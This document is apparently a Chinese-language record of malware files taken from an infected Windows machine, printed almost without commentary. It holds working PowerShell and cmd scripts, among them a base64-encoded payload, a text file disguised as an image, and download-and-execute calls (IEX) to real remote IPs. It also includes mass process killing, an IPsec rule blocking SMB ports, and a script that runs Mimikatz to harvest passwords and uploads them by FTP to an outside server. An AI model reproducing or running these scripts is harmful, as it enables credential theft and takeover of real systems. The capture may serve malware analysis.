取樣時, 後面綠色的部分為死機狀態或已刪檔, 故沒能擷取內容做紀錄
S.ps1的內容
Z3dtaSAtQ2xhc3MgJ1dpbjMyX1Byb2Nlc3MnIC1GaWx0ZXIgIk5hbWU9J3N2Y2hvc3QuZXhlJyJ8JXtpZigoJF8uRXhlY3V0YWJsZVBhdGggLW5lICgkZW52OndpbmRpcisnXHN5c3RlbTMyXHN2Y2hvc3QuZXhlJykpIC1hbmQgKCRfLkV4ZWN1dGFibGVQYXRoIC1uZSAoJGVudjp3aW5kaXIrJ1xzeXN3b3c2NFxzdmNob3N0LmV4ZScpKSl7JF8uVGVybWluYXRlKCk7ZGVsIC1MaXRlcmFsUGF0aCAkXy5FeGVjdXRhYmxlUGF0aCAtRm9yY2U7fX0NCg0KDQoNCmd3bWkgLUNsYXNzICdXaW4zMl9Qcm9jZXNzJyAtRmlsdGVyICJOYW1lPSdjb25ob3N0LmV4ZScifCV7aWYoKCRfLkV4ZWN1dGFibGVQYXRoIC1uZSAoJGVudjp3aW5kaXIrJ1xzeXN0ZW0zMlxjb25ob3N0LmV4ZScpKSAtYW5kICgkXy5FeGVjdXRhYmxlUGF0aCAtbmUgKCRlbnY6d2luZGlyKydcc3lzd293NjRcY29uaG9zdC5leGUnKSkpeyRfLlRlcm1pbmF0ZSgpO3NsZWVwIC1zIDI7c3RhcnQtcHJvY2VzcyBjOlx3aW5kb3dzXHRlbXBcY29uaG9zdC5leGU7fX0NCg==
523Bytes的內容
gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env#58windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env#58windir+'\syswow64\svchost.exe'))){$_.Terminate()#59del -LiteralPath $_.ExecutablePath -Force#59}}
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env#58windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env#58windir+'\syswow64\conhost.exe'))){$_.Terminate()#59sleep -s 2#59start-process c#58\windows\temp\conhost.exe#59}}
s.txt的內容
$url="http://139.5.177.19/l.txt";
$web = New-Object System.Net.WebClient;
$text = $web.DownloadString($url);
$list=$text.trim().split("`r`n",[StringSplitOptions]::RemoveEmptyEntries);
for($i=0;$i -lt $list.count;$i++){
$line=$list[$i].trim().split(",");
Get-Process|?{$_.Name -eq ($line[0] -replace "\.[^\.]+$","")}|Stop-Process -Force;
Get-WmiObject Win32_Process -Filter ("name='"+$line[0]+"'")|%{$_.Terminate();}
if($line[2].toString() -eq "1"){
if(test-path -LiteralPath $line[1]){
Remove-Item -LiteralPath $line[1] -Force;
}
}
}
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='fuckyoumm2_filter'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer -Filter "Name='fuckyoumm2_consumer'" | Remove-WmiObject -Verbose
IEX (New-Object system.Net.WebClient).DownloadString('http://79.124.78.127/up.txt')
s.jpg (偽裝成圖片檔的文字內容)
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem | Out-File c.txt
cmd.exe /c taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im new.exe /im upsupx.exe /im 84.exe /im las.exe /im sys.exe /im seser.exe /im ercKK.exe /im MDI6MD.exe
cmd /c attrib -s -h -r c:\windows\syswow64\seser.exe
cmd /c del c:\windows\syswow64\seser.exe
cmd /c del c:\windows\system32\sys.exe
cmd /c del c:\windows\syswow64\las.exe
cmd /c del c:\windows\syswow64\84.exe
cmd /c cacls C:\Windows\IIS\*.exe /e /d system
cmd /c cacls C:\Windows\Fonts\Mysql\*.exe /e /d system
cmd /c del C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\*.exe
cmd /c del c:\windows\ercKK.exe
cmd.exe /c netsh ipsec static delete policy name=win | netsh ipsec static add policy name=win | netsh ipsec static add filterlist name=Allowlist | netsh ipsec static add filterlist name=denylist | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139 | netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445 | netsh ipsec static add filteraction name=Allow action=permit | netsh ipsec static add filteraction name=deny action=block | netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny | netsh ipsec static set policy name=win assign=y
l.txt的內容
lsmose.exe,C:\Windows\debug\lsmose.exe,1
lsmos.exe,C:\Windows\debug\lsmos.exe,1
lsmo.exe,C:\Windows\debug\lsmo.exe,1
csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,1
csrw.exe,C:\Program Files\Common Files\csrw.exe,1
lsmosee.exe,c:\windows\help\lsmosee.exe,1
csrs.exe,c:\csrs.exe,1
$txt=New-Object -TypeName System.Collections.ArrayList;
$localip="";
[System.Net.Dns]::GetHostAddresses('')|?{$_.AddressFamily -eq "InterNetwork"}|%{$localip=$_.IPAddressToString}
$publicip="";
$client=New-Object "System.Net.WebClient";
[byte[]]$data=$client.DownloadData("http://2019.ip138.com/ic.asp");
$html=[System.Text.Encoding]::Default.GetString($data);
if($html -match "\[(\d+\.\d+\.\d+\.\d+)\]"){$publicip=$matches[1];}
$process=gwmi -class "Win32_Process";
foreach($p in $process){
[void]$txt.Add(("??:"+$p.ExecutablePath));
[void]$txt.Add(("???:"+$p.CommandLine));
[void]$txt.Add("");
};
[void]$txt.Add("");
$os=gwmi -class "Win32_OperatingSystem";
$ver="";
foreach($o in $os){
[void]$txt.Add(("??:"+$o.Caption+"["+$o.Version+"]"));
$ver=$o.Caption+"["+$o.Version+"]";
}
[void]$txt.Add("");
$mem=gwmi -class "Win32_PhysicalMemory";
$i=0;
foreach($m in $mem){
[void]$txt.Add(("??"+($i++)+":"+$m.Capacity));
}
[void]$txt.Add("");
$cpu=gwmi -class "Win32_Processor";
$i=0;
$load="";
foreach($c in $cpu){
[void]$txt.Add(("CPU"+($i++)+":["+$c.LoadPercentage+"%]"+$c.Name));
$load+=($c.LoadPercentage.toString()+"%-");
};
[void]$txt.Add("");
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');
$mm=[regex]::matches((Invoke-Mimikatz),'\* Username :.+\n.+?\* Domain :.+?\n.+?\* Password :.+');
$s="";
foreach($i in $mm){$s+=$i.value.trim()+"`r`n";};
[void]$txt.Add($s);
$txtfile=($env:tmp)+"\"+$publicip+"_"+$localip+"_"+$ver+"_"+$load.trimend("-")+".txt";
$fs=New-Object System.IO.FileStream($txtfile, [System.IO.FileMode]::Create);
$sw=New-Object System.IO.StreamWriter($fs, [Text.Encoding]::UTF8);
$sw.WriteLine(($txt -join "`r`n"));
$sw.Close();
$fs.Close();
$sw.Dispose();
$fs.Dispose();
$upfile=New-Object System.Io.FileInfo($txtfile);
$ftpip="192.187.111.66";
$ftpport="21";
$ftpusername="up";
$ftppassword="1433";
$ftpclient=[system.net.ftpwebrequest] [system.net.ftpwebrequest]::create("ftp://"+$ftpip+":"+$ftpport+"/"+$upfile.Name);
$ftpclient.UseBinary = $true;
$ftpclient.Timeout = 5*1000;
$ftpclient.Credentials = New-Object System.Net.NetworkCredential($ftpusername,$ftppassword);
$ftpclient.Method=[system.net.WebRequestMethods+ftp]::UploadFile;
$ftpclient.KeepAlive=$false;
$sourceStream=New-Object System.Io.StreamReader($upfile.FullName);
$fileContents=[System.Text.Encoding]::UTF8.GetBytes($sourceStream.ReadToEnd());
$sourceStream.Close();
$ftpclient.ContentLength=$fileContents.Length;
$requestStream=$ftpclient.GetRequestStream();
$requestStream.Write($fileContents, 0, $fileContents.Length);
$requestStream.Close();
$response=$ftpclient.GetResponse();
$response.StatusDescription;
$response.Close();
最後這個檔案比較大,可以另存新檔查看內容